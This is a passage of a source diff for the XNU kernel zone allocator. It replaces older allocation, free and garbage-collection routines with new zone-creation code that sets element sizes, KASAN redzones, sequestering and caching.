%d", sub_map_idx, zone_last_submap_idx); + } + zone->z_submap_idx = sub_map_idx; } -void * -zalloc_flags(union zone_or_view zov, zalloc_flags_t flags) +void +zone_set_noexpand(zone_t zone, vm_size_t nelems) { - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(!zone->percpu); - return zalloc_ext(zone, zstats, flags, 0); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + zone->expandable = false; + zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems); } -void * -zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags) +void +zone_set_exhaustible(zone_t zone, vm_size_t nelems) { - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(zone->percpu); - return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags, 0)); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + zone->expandable = false; + zone->exhaustible = true; + zone->z_wired_max = zone_alloc_pages_for_nelems(zone, nelems); } -static void * -_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask) +/** + * @function zone_create_find + * + * @abstract + * Finds an unused zone for the given name and element size. + * + * @param name the zone name + * @param size the element size (including redzones, ...) + * @param flags the flags passed to @c zone_create* + * @param zid_inout the desired zone ID or ZONE_ID_ANY + * + * @returns a zone to initialize further. 
+ */ +static zone_t +zone_create_find( + const char *name, + vm_size_t size, + zone_create_flags_t flags, + zone_id_t *zid_inout) { - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - struct zone_page_metadata *page_meta; - vm_offset_t offs, addr; - zone_pva_t pva; + zone_id_t nzones, zid = *zid_inout; + zone_t z; - assert(ml_get_interrupts_enabled() || - ml_is_quiescing() || - debug_mode_active() || - startup_phase < STARTUP_SUB_EARLY_BOOT); + simple_lock(&all_zones_lock, &zone_locks_grp); - size = (size + mask) & ~mask; - assert(size <= PAGE_SIZE); + nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed); + assert(num_zones_in_use <= nzones && nzones < MAX_ZONES); - lock_zone(zone); - assert(zone->z_self == zone); + if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) { + /* + * The first time around, make sure the reserved zone IDs + * have an initialized lock as zone_index_foreach() will + * enumerate them. + */ + while (nzones < ZONE_ID__FIRST_DYNAMIC) { + zone_init_defaults(nzones++); + } + + os_atomic_store(&num_zones, nzones, release); + } + + if (zid != ZONE_ID_ANY) { + if (zid >= ZONE_ID__FIRST_DYNAMIC) { + panic("zone_create: invalid desired zone ID %d for %s", + zid, name); + } + if (flags & ZC_DESTRUCTIBLE) { + panic("zone_create: ID %d (%s) must be permanent", zid, name); + } + if (zone_array[zid].z_self) { + panic("zone_create: creating zone ID %d (%s) twice", zid, name); + } + z = &zone_array[zid]; + } else { + if (flags & ZC_DESTRUCTIBLE) { + /* + * If possible, find a previously zdestroy'ed zone in the + * zone_array that we can reuse. 
+ */ + for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES); + i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) { + z = &zone_array[i]; - for (;;) { - pva = zone->pages_intermediate; - while (!zone_pva_is_null(pva)) { - page_meta = zone_pva_to_meta(pva, kind); - if (page_meta->zm_freelist_offs + size <= PAGE_SIZE) { - goto found; + /* + * If the zone name and the element size are the + * same, we can just reuse the old zone struct. + */ + if (strcmp(z->z_name, name) || zone_elem_size(z) != size) { + continue; + } + bitmap_clear(zone_destroyed_bitmap, i); + z->z_destroyed = false; + z->z_self = z; + zid = (zone_id_t)i; + goto out; } - pva = page_meta->zm_page_next; } - zone_refill_synchronously_locked(zone, Z_WAITOK); - } - -found: - offs = (page_meta->zm_freelist_offs + mask) & ~mask; - page_meta->zm_freelist_offs = offs + size; - page_meta->zm_alloc_count += size; - zone->countfree -= size; - if (__probable(zone->z_stats)) { - zpercpu_get(zone->z_stats)->zs_mem_allocated += size; - } + zid = nzones++; + z = zone_init_defaults(zid); - if (page_meta->zm_alloc_count >= PAGE_SIZE - sizeof(vm_offset_t)) { - zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind); + /* + * The release barrier pairs with the acquire in + * zone_index_foreach() and makes sure that enumeration loops + * always see an initialized zone lock. 
+ */ + os_atomic_store(&num_zones, nzones, release); } - unlock_zone(zone); - - addr = offs + zone_pva_to_addr(pva); +out: + num_zones_in_use++; + simple_unlock(&all_zones_lock); - DTRACE_VM2(zalloc, zone_t, zone, void*, addr); - return (void *)addr; + *zid_inout = zid; + return z; } -static void * -_zalloc_permanent_large(size_t size, vm_offset_t mask) +__abortlike +static void +zone_create_panic(const char *name, const char *f1, const char *f2) { - kern_return_t kr; - vm_offset_t addr; - - kr = kernel_memory_allocate(kernel_map, &addr, size, mask, - KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO, - VM_KERN_MEMORY_KALLOC); - if (kr != 0) { - panic("zalloc_permanent: unable to allocate %zd bytes (%d)", - size, kr); - } - return (void *)addr; + panic("zone_create: creating zone %s: flag %s and %s are incompatible", + name, f1, f2); } +/* + * Panics through zone_create_panic() when flags contains forbidden_flag, + * naming both current_flag and forbidden_flag in the message. + * + * Wrapped in do { } while (0) so that the expansion is a single statement + * that stays correct next to an if/else at the call site. + */ +#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \ + do { \ + if ((flags) & (forbidden_flag)) { \ + zone_create_panic(name, #current_flag, #forbidden_flag); \ + } \ + } while (0) -void * -zalloc_permanent(vm_size_t size, vm_offset_t mask) +/* + * Adjusts the size of the element based on minimum size, alignment + * and kasan redzones + */ +static vm_size_t +zone_elem_adjust_size( + const char *name __unused, + vm_size_t elem_size, + zone_create_flags_t flags __unused, + uint32_t *redzone __unused) { - if (size <= PAGE_SIZE) { - zone_t zone = &zone_array[ZONE_ID_PERMANENT]; - return _zalloc_permanent(zone, size, mask); + vm_size_t size; + /* + * Adjust element size for minimum size and pointer alignment + */ + size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t); + if (size < ZONE_MIN_ELEM_SIZE) { + size = ZONE_MIN_ELEM_SIZE; } - return _zalloc_permanent_large(size, mask); -} -void * -zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask) -{ - zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT]; - return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask)); +#if KASAN_ZALLOC + /* + * Expand the zone allocation size to 
include the redzones. + * + * For page-multiple zones add a full guard page because they + * likely require alignment. + */ + uint32_t redzone_tmp; + if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) { + redzone_tmp = 0; + } else if ((size & PAGE_MASK) == 0) { + if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) { + panic("zone_create: zone %s can't provide more than PAGE_SIZE " + "alignment", name); + } + redzone_tmp = PAGE_SIZE; + } else if (flags & ZC_ALIGNMENT_REQUIRED) { + redzone_tmp = 0; + } else { + redzone_tmp = KASAN_GUARD_SIZE; + } + size += redzone_tmp * 2; + if (redzone) { + *redzone = redzone_tmp; + } +#endif + return size; } -void -zalloc_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) +/* + * Returns the allocation chunk size that has least fragmentation + * + * Per-cpu zones use one page per CPU, and panic when a single page + * would waste more than 256 bytes. Elements that are a multiple of the + * page size, or that divide a page evenly, have no fragmentation. + * Otherwise every page multiple up to ZONE_MAX_ALLOC_SIZE is tried and + * the first one wasting the smallest percentage of the chunk is kept. + */ +static vm_size_t +zone_get_min_alloc_granule( + vm_size_t elem_size, + zone_create_flags_t flags) { - zone_index_foreach(i) { - zone_t z = &zone_array[i]; - - if (z->no_callout) { - /* async_pending will never be set */ - continue; + vm_size_t alloc_granule = PAGE_SIZE; + if (flags & ZC_PERCPU) { + alloc_granule = PAGE_SIZE * zpercpu_count(); + if (PAGE_SIZE % elem_size > 256) { + panic("zone_create: per-cpu zone has too much fragmentation"); } - - lock_zone(z); - if (z->z_self && z->async_pending) { - z->async_pending = false; - zone_refill_synchronously_locked(z, Z_WAITOK); + } else if ((elem_size & PAGE_MASK) == 0) { + /* zero fragmentation by definition */ + alloc_granule = elem_size; + } else if (alloc_granule % elem_size == 0) { + /* zero fragmentation by definition */ + } else { + vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule; + vm_size_t alloc_tmp = PAGE_SIZE; + while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) { + vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp; + if (frag_tmp < frag) { + frag = frag_tmp; + alloc_granule = alloc_tmp; + } } - unlock_zone(z); } + return alloc_granule; } -/* - * Adds the element to the 
head of the zone's free list - * Keeps a backup next-pointer at the end of the element - */ -void -zfree_direct_locked(zone_t zone, vm_offset_t element, bool poison) +vm_size_t +zone_get_foreign_alloc_size( + const char *name __unused, + vm_size_t elem_size, + zone_create_flags_t flags, + uint16_t min_pages) { - struct zone_page_metadata *page_meta; - vm_offset_t page, old_head; - zone_addr_kind_t kind; - vm_size_t elem_size = zone_elem_size(zone); - - vm_offset_t *primary = (vm_offset_t *) element; - vm_offset_t *backup = get_backup_ptr(elem_size, primary); + vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags, + NULL); + vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size, + flags); + vm_size_t min_size = min_pages * PAGE_SIZE; + /* + * Round up min_size to a multiple of alloc_granule + */ + return ((min_size + alloc_granule - 1) / alloc_granule) + * alloc_granule; +} - page_meta = zone_allocated_element_resolve(zone, element, &page, &kind); - old_head = zone_page_meta_get_freelist(zone, page_meta, page); +zone_t +zone_create_ext( + const char *name, + vm_size_t size, + zone_create_flags_t flags, + zone_id_t zid, + void (^extra_setup)(zone_t)) +{ + vm_size_t alloc; + uint32_t redzone; + zone_t z; - if (__improbable(old_head == element)) { - panic("zfree: double free of %p to zone %s%s\n", - (void *) element, zone_heap_name(zone), zone->z_name); + if (size > ZONE_MAX_ALLOC_SIZE) { + panic("zone_create: element size too large: %zd", (size_t)size); } -#if ZALLOC_ENABLE_POISONING - if (poison && elem_size < ZONE_MIN_ELEM_SIZE) { - assert(zone->percpu); - poison = false; + if (size < 2 * sizeof(vm_size_t)) { + /* Elements are too small for kasan. 
*/ + flags |= ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; } -#else - poison = false; -#endif + size = zone_elem_adjust_size(name, size, flags, &redzone); /* - * Always write a redundant next pointer - * So that it is more difficult to forge, xor it with a random cookie - * A poisoned element is indicated by using zp_poisoned_cookie - * instead of zp_nopoison_cookie + * Allocate the zone slot, return early if we found an older match. */ - - *backup = old_head ^ (poison ? zp_poisoned_cookie : zp_nopoison_cookie); + z = zone_create_find(name, size, flags, &zid); + if (__improbable(z->z_self)) { + /* We found a zone to reuse */ + return z; + } /* - * Insert this element at the head of the free list. We also xor the - * primary pointer with the zp_nopoison_cookie to make sure a free - * element does not provide the location of the next free element directly. + * Initialize the zone properly. */ - *primary = old_head ^ zp_nopoison_cookie; -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = (ZTAG(zone, element)[0] >> 1); - // set the tag with b0 clear so the block remains inuse - ZTAG(zone, element)[0] = 0xFFFE; - vm_tag_update_zone_size(tag, zone->tag_zone_index, - -((int64_t)elem_size), 0); + /* + * If the kernel is post lockdown, copy the zone name passed in. + * Else simply maintain a pointer to the name string as it can only + * be a core XNU zone (no unloadable kext exists before lockdown). 
+ */ + if (startup_phase >= STARTUP_SUB_LOCKDOWN) { + size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN); + char *buf = zalloc_permanent(nsz, ZALIGN_NONE); + strlcpy(buf, name, nsz); + z->z_name = buf; + } else { + z->z_name = name; } -#endif /* VM_MAX_TAG_ZONES */ - - zone_page_meta_set_freelist(page_meta, page, element); - if (os_sub_overflow(page_meta->zm_alloc_count, 1, - &page_meta->zm_alloc_count)) { - zone_page_meta_accounting_panic(zone, page_meta, - "alloc_count wrap-around"); + if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { + z->z_stats = zalloc_percpu_permanent_type(struct zone_stats); + } else { + /* + * zone_init() hasn't run yet, use the storage provided by + * zone_stats_startup(), and zone_init() will replace it + * with the final value once the PERCPU zone exists. + */ + z->z_stats = __zpcpu_mangle_for_boot(&zone_stats_startup[zone_index(z)]); } - zone->countfree++; - if (kind == ZONE_ADDR_FOREIGN) { - if (old_head == 0) { - /* first foreign element freed on page, move from all_used_foreign */ - zone_meta_requeue(zone, &zone->pages_any_free_foreign, page_meta, kind); - } - } else if (page_meta->zm_alloc_count == 0) { - /* whether the page was on the intermediate or all_used, queue, move it to free */ - zone_meta_requeue(zone, &zone->pages_all_free, page_meta, kind); - zone->allfree_page_count += page_meta->zm_page_count; - } else if (old_head == 0) { - /* first free element on page, move from all_used */ - zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind); + alloc = zone_get_min_alloc_granule(size, flags); + + if (flags & ZC_KALLOC_HEAP) { + size_t rem = (alloc % size) / (alloc / size); + + /* + * Try to grow the elements size and spread them more if the remaining + * space is large enough. 
+ */ + size += rem & ~(KALLOC_MINALIGN - 1); } -#if KASAN_ZALLOC - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - kasan_poison_range(element + ptoa(i), elem_size, - ASAN_HEAP_FREED); - } + z->z_elem_size = (uint16_t)size; + z->z_chunk_pages = (uint16_t)atop(alloc); + if (flags & ZC_PERCPU) { + z->z_chunk_elems = (uint16_t)(PAGE_SIZE / z->z_elem_size); } else { - kasan_poison_range(element, elem_size, ASAN_HEAP_FREED); + z->z_chunk_elems = (uint16_t)(alloc / z->z_elem_size); + } + if (zone_element_idx(zone_element_encode(0, + z->z_chunk_elems - 1, ZPM_AUTO)) != z->z_chunk_elems - 1) { + panic("zone_element_encode doesn't work for zone [%s]", name); } -#endif -} - -/* - * The function is noinline when zlog can be used so that the backtracing can - * reliably skip the zfree_ext() and zfree_log_trace() - * boring frames. - */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -#endif -void -zfree_ext(zone_t zone, zone_stats_t zstats, void *addr) -{ - vm_offset_t elem = (vm_offset_t)addr; - vm_size_t elem_size = zone_elem_size(zone); - bool poison = false; - - DTRACE_VM2(zfree, zone_t, zone, void*, addr); - TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem); #if KASAN_ZALLOC - if (kasan_quarantine_freed_element(&zone, &addr)) { - return; + z->z_kasan_redzone = redzone; + if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) { + z->kasan_fakestacks = true; } +#endif + /* - * kasan_quarantine_freed_element() might return a different - * {zone, addr} than the one being freed for kalloc heaps. - * - * Make sure we reload everything. 
+ * Handle KPI flags */ - elem = (vm_offset_t)addr; - elem_size = zone_elem_size(zone); +#if __LP64__ + if (flags & ZC_SEQUESTER) { + z->z_va_sequester = true; + } #endif + /* ZC_CACHING applied after all configuration is done */ + if (flags & ZC_NOCACHING) { + z->z_nocaching = true; + } + + if (flags & ZC_PERCPU) { + /* + * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for + * pointer-sized allocations which poisoning doesn't support. + */ + zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN); + z->z_percpu = true; + z->gzalloc_exempt = true; + z->z_free_zeroes = true; + } + if (flags & ZC_ZFREE_CLEARMEM) { + z->z_free_zeroes = true; + } + if (flags & ZC_NOGC) { + z->collectable = false; + } + if (flags & ZC_NOENCRYPT) { + z->z_noencrypt = true; + } + if (flags & ZC_ALIGNMENT_REQUIRED) { + z->alignment_required = true; + } + if (flags & ZC_NOGZALLOC) { + z->gzalloc_exempt = true; + } + if (flags & ZC_NOCALLOUT) { + z->no_callout = true; + } + if (flags & ZC_DESTRUCTIBLE) { + zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN); + z->z_destructible = true; + } -#if CONFIG_ZLEAKS /* - * Zone leak detection: un-track the allocation + * Handle Internal flags */ - if (__improbable(zone->zleak_on)) { - zleak_free(elem, elem_size); + if (flags & ZC_ALLOW_FOREIGN) { + z->z_allows_foreign = true; } -#endif /* CONFIG_ZLEAKS */ + if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && + (flags & ZC_DATA_BUFFERS)) { + z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; + } + if (flags & ZC_KASAN_NOQUARANTINE) { + z->kasan_noquarantine = true; + } + /* ZC_KASAN_NOREDZONE already handled */ -#if CONFIG_ZCACHE /* - * Note: if zone caching is on, gzalloc and tags aren't used - * so we can always check this first + * Then if there's extra tuning, do it */ - if (zone_caching_enabled(zone)) { - return zcache_free_to_cpu_cache(zone, zstats, (vm_offset_t)addr); + if (extra_setup) { + extra_setup(z); } -#endif /* CONFIG_ZCACHE */ + /* 
+ * Configure debugging features + */ #if CONFIG_GZALLOC - if (__improbable(zone->gzalloc_tracked)) { - return gzalloc_free(zone, zstats, addr); + gzalloc_zone_init(z); /* might set z->gzalloc_tracked */ + if (z->gzalloc_tracked) { + z->z_nocaching = true; } -#endif /* CONFIG_GZALLOC */ - +#endif #if ZONE_ENABLE_LOGGING - if (__improbable(DO_LOGGING(zone))) { - zfree_log_trace(zone, elem); + if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) { + /* + * Check for and set up zone leak detection if requested via boot-args. + * might set z->zone_logging + */ + zone_setup_logging(z); } #endif /* ZONE_ENABLE_LOGGING */ - - if (zone->zfree_clear_mem) { - poison = zfree_clear(zone, elem, elem_size); +#if VM_MAX_TAG_ZONES + if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) { + static int tag_zone_index; + vm_offset_t esize = zone_elem_size(z); + z->tags = true; + z->tags_inline = (((page_size + esize - 1) / esize) <= + (sizeof(uint32_t) / sizeof(uint16_t))); + z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed); + assert(z->tag_zone_index < VM_MAX_TAG_ZONES); } +#endif - lock_zone(zone); - assert(zone->z_self == zone); - - if (!poison) { - poison = zfree_poison_element(zone, &zone->zp_count, elem); + /* + * Finally, fixup properties based on security policies, boot-args, ... + */ + if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && + z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) { + z->z_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; } - - if (__probable(zstats != NULL)) { - /* - * The few vm zones used before zone_init() runs do not have - * per-cpu stats yet - */ - zpercpu_get(zstats)->zs_mem_freed += elem_size; +#if __LP64__ + if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) && + (flags & ZC_NOSEQUESTER) == 0 && + z->z_submap_idx == Z_SUBMAP_IDX_GENERAL) { + z->z_va_sequester = true; + } +#endif + /* + * Clear entire element for non data zones and upto zp_min_size for + * data zones. 
+ */ + if (z->z_submap_idx != Z_SUBMAP_IDX_BAG_OF_BYTES) { + z->z_free_zeroes = true; + } else if (size <= zp_min_size) { + z->z_free_zeroes = true; } - zfree_direct_locked(zone, elem, poison); - - unlock_zone(zone); -} - -void -(zfree)(union zone_or_view zov, void *addr) -{ - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(!zone->percpu); - zfree_ext(zone, zstats, addr); -} - -void -zfree_percpu(union zone_or_view zov, void *addr) -{ - zone_t zone = zov.zov_view->zv_zone; - zone_stats_t zstats = zov.zov_view->zv_stats; - assert(zone->percpu); - zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr)); -} - -#pragma mark vm integration, MIG routines - -/* - * Drops (i.e. frees) the elements in the all free pages queue of a zone. - * Called by zone_gc() on each zone and when a zone is zdestroy()ed. - */ -static void -zone_drop_free_elements(zone_t z) -{ - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - unsigned int total_freed_pages = 0; - struct zone_page_metadata *page_meta, *seq_meta; - vm_address_t page_addr; - vm_size_t size_to_free; - vm_size_t free_count; - uint32_t page_count; - - current_thread()->options |= TH_OPT_ZONE_PRIV; - lock_zone(z); - - while (!zone_pva_is_null(z->pages_all_free)) { + if ((flags & ZC_CACHING) && !z->z_nocaching) { /* - * If any replenishment threads are running, defer to them, - * so that we don't deplete reserved zones. + * If zcache hasn't been initialized yet, remember our decision, * - * The timing of the check isn't super important, as there are - * enough reserves to allow freeing an extra page_meta. - * - * Hence, we can check without grabbing the lock every time - * through the loop. We do need the lock however to avoid - * missing a wakeup when we decide to block. 
- */ - if (zone_replenish_active > 0) { - lck_spin_lock(&zone_replenish_lock); - if (zone_replenish_active > 0) { - assert_wait(&zone_replenish_active, THREAD_UNINT); - lck_spin_unlock(&zone_replenish_lock); - unlock_zone(z); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(z); - continue; - } - lck_spin_unlock(&zone_replenish_lock); - } - - page_meta = zone_pva_to_meta(z->pages_all_free, kind); - page_count = page_meta->zm_page_count; - free_count = zone_elem_count(z, ptoa(page_count), kind); - - /* - * Don't drain zones with async refill to below the refill - * threshold, as they need some reserve to function properly. + * zone_enable_caching() will be called again by + * zcache_bootstrap(), while the system is still single + * threaded, to build the missing caches. */ - if (!z->destroyed && z->prio_refill_count && - (vm_size_t)(z->countfree - free_count) < z->prio_refill_count) { - break; - } - - zone_meta_queue_pop(z, &z->pages_all_free, kind, &page_addr); - - if (os_sub_overflow(z->countfree, free_count, &z->countfree)) { - zone_accounting_panic(z, "countfree wrap-around"); - } - if (os_sub_overflow(z->countavail, free_count, &z->countavail)) { - zone_accounting_panic(z, "countavail wrap-around"); - } - if (os_sub_overflow(z->allfree_page_count, page_count, - &z->allfree_page_count)) { - zone_accounting_panic(z, "allfree_page_count wrap-around"); - } - if (os_sub_overflow(z->page_count, page_count, &z->page_count)) { - zone_accounting_panic(z, "page_count wrap-around"); - } - - os_atomic_sub(&zones_phys_page_count, page_count, relaxed); - os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed); - - bzero(page_meta, sizeof(*page_meta) * page_count); - seq_meta = page_meta; - page_meta = NULL; /* page_meta fields are zeroed, prevent reuse */ - - unlock_zone(z); - - /* Free the pages for metadata and account for them */ - total_freed_pages += page_count; - size_to_free = ptoa(page_count); -#if KASAN_ZALLOC - kasan_poison_range(page_addr, size_to_free, 
ASAN_VALID); -#endif -#if VM_MAX_TAG_ZONES - if (z->tags) { - ztMemoryRemove(z, page_addr, size_to_free); - } -#endif /* VM_MAX_TAG_ZONES */ - - if (z->va_sequester && z->alloc_pages == page_count) { - kernel_memory_depopulate(submap_for_zone(z), page_addr, - size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE); + if (__probable(zc_magazine_zone)) { + zone_enable_caching(z); } else { - kmem_free(submap_for_zone(z), page_addr, size_to_free); - seq_meta = NULL; + z->z_pcpu_cache = + __zpcpu_mangle_for_boot(&zone_cache_startup[zid]); } - thread_yield_to_preemption(); - - lock_zone(z); - - if (seq_meta) { - zone_meta_queue_push(z, &z->pages_sequester, seq_meta, kind); - z->sequester_page_count += page_count; - } - } - if (z->destroyed) { - assert(zone_pva_is_null(z->pages_all_free)); - assert(z->allfree_page_count == 0); - } - unlock_zone(z); - current_thread()->options &= ~TH_OPT_ZONE_PRIV; - -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) { - kprintf("zone_gc() of zone %s%s freed %lu elements, %d pages\n", - zone_heap_name(z), z->z_name, - (unsigned long)(ptoa(total_freed_pages) / z->pcpu_elem_size), - total_freed_pages); - } -#endif /* DEBUG || DEVELOPMENT */ -} - -/* Zone garbage collection - * - * zone_gc will walk through all the free elements in all the - * zones that are marked collectable looking for reclaimable - * pages. zone_gc is called by consider_zone_gc when the system - * begins to run out of memory. - * - * We should ensure that zone_gc never blocks. - */ -void -zone_gc(boolean_t consider_jetsams) -{ - if (consider_jetsams) { - kill_process_in_largest_zone(); - /* - * If we do end up jetsamming something, we need to do a zone_gc so that - * we can reclaim free zone elements and update the zone map size. - * Fall through. 
- */ } - lck_mtx_lock(&zone_gc_lock); - -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) { - kprintf("zone_gc() starting...\n"); - } -#endif /* DEBUG || DEVELOPMENT */ - - zone_index_foreach(i) { - zone_t z = &zone_array[i]; - - if (!z->collectable) { - continue; - } -#if CONFIG_ZCACHE - if (zone_caching_enabled(z)) { - zcache_drain_depot(z); - } -#endif /* CONFIG_ZCACHE */ - if (zone_pva_is_null(z->pages_all_free)) { - continue; + if (zp_factor != 0 && !z->z_free_zeroes) { + if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { + zpercpu_foreach(zs, z->z_stats) { + zs->zs_poison_seqno = zone_poison_count_init(z); + } + } else { + zone_stats_startup[zid].zs_poison_seqno = + zone_poison_count_init(z); } - - zone_drop_free_elements(z); } - lck_mtx_unlock(&zone_gc_lock); -} + zone_lock(z); + z->z_self = z; + zone_unlock(z); -/* - * consider_zone_gc: - * - * Called by the pageout daemon when the system needs more free pages. - */ + return z; +} +__startup_func void -consider_zone_gc(boolean_t consider_jetsams) +zone_create_startup(struct zone_create_startup_spec *spec) { - /* - * One-time reclaim of kernel_map resources we allocated in - * early boot. - * - * Use atomic exchange in case multiple threads race into here. - */ - vm_offset_t deallocate_kaddr; - if (kmapoff_kaddr != 0 && - (deallocate_kaddr = os_atomic_xchg(&kmapoff_kaddr, 0, relaxed)) != 0) { - vm_deallocate(kernel_map, deallocate_kaddr, ptoa_64(kmapoff_pgcnt)); - } - - zone_gc(consider_jetsams); + *spec->z_var = zone_create_ext(spec->z_name, spec->z_size, + spec->z_flags, spec->z_zid, spec->z_setup); } /* - * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls - * requesting zone information. - * Frees unused pages towards the end of the region, and zero'es out unused - * space on the last page. + * The first 4 fields of a zone_view and of a zone must alias each other + * (same offsets), so that the zone_or_view_t union works. + * Trust but verify: the static asserts below check each pair of offsets. 
*/ -static vm_map_copy_t -create_vm_map_copy( - vm_offset_t start_addr, - vm_size_t total_size, - vm_size_t used_size) -{ - kern_return_t kr; - vm_offset_t end_addr; - vm_size_t free_size; - vm_map_copy_t copy; - - if (used_size != total_size) { - end_addr = start_addr + used_size; - free_size = total_size - (round_page(end_addr) - start_addr); - - if (free_size >= PAGE_SIZE) { - kmem_free(ipc_kernel_map, - round_page(end_addr), free_size); - } - bzero((char *) end_addr, round_page(end_addr) - end_addr); - } - - kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr, - (vm_map_size_t)used_size, TRUE, &copy); - assert(kr == KERN_SUCCESS); - - return copy; -} +#define zalloc_check_zov_alias(f1, f2) \ + static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2)) +zalloc_check_zov_alias(z_self, zv_zone); +zalloc_check_zov_alias(z_stats, zv_stats); +zalloc_check_zov_alias(z_name, zv_name); +zalloc_check_zov_alias(z_views, zv_next); +#undef zalloc_check_zov_alias -static boolean_t -get_zone_info( - zone_t z, - mach_zone_name_t *zn, - mach_zone_info_t *zi) +__startup_func +void +zone_view_startup_init(struct zone_view_startup_spec *spec) { - struct zone zcopy; + struct kalloc_heap *heap = NULL; + zone_view_t zv = spec->zv_view; + zone_t z; - assert(z != ZONE_NULL); - lock_zone(z); - if (!z->z_self) { - unlock_zone(z); - return FALSE; + switch (spec->zv_heapid) { + case KHEAP_ID_DEFAULT: + heap = KHEAP_DEFAULT; + break; + case KHEAP_ID_DATA_BUFFERS: + heap = KHEAP_DATA_BUFFERS; + break; + case KHEAP_ID_KEXT: + heap = KHEAP_KEXT; + break; + default: + heap = NULL; } - zcopy = *z; - unlock_zone(z); - - if (zn != NULL) { - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); - /* assuming here the name data is static */ - (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name, - strlen(temp_zone_name) + 1); + if 
(heap) { + z = kalloc_heap_zone_for_size(heap, spec->zv_size); + assert(z); + } else { + z = spec->zv_zone; + assert(spec->zv_size <= zone_elem_size(z)); } - if (zi != NULL) { - *zi = (mach_zone_info_t) { - .mzi_count = zone_count_allocated(&zcopy), - .mzi_cur_size = ptoa_64(zcopy.page_count), - // max_size for zprint is now high-watermark of pages used - .mzi_max_size = ptoa_64(zcopy.page_count_hwm), - .mzi_elem_size = zcopy.pcpu_elem_size, - .mzi_alloc_size = ptoa_64(zcopy.alloc_pages), - .mzi_exhaustible = (uint64_t)zcopy.exhaustible, - }; - zpercpu_foreach(zs, zcopy.z_stats) { - zi->mzi_sum_size += zs->zs_mem_allocated; - } - if (zcopy.collectable) { - SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable, - ptoa_64(zcopy.allfree_page_count)); - SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE); - } + zv->zv_zone = z; + zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats); + zv->zv_next = z->z_views; + if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) { + /* + * count the raw view for zones not in a heap, + * kalloc_heap_init() already counts it for its members. 
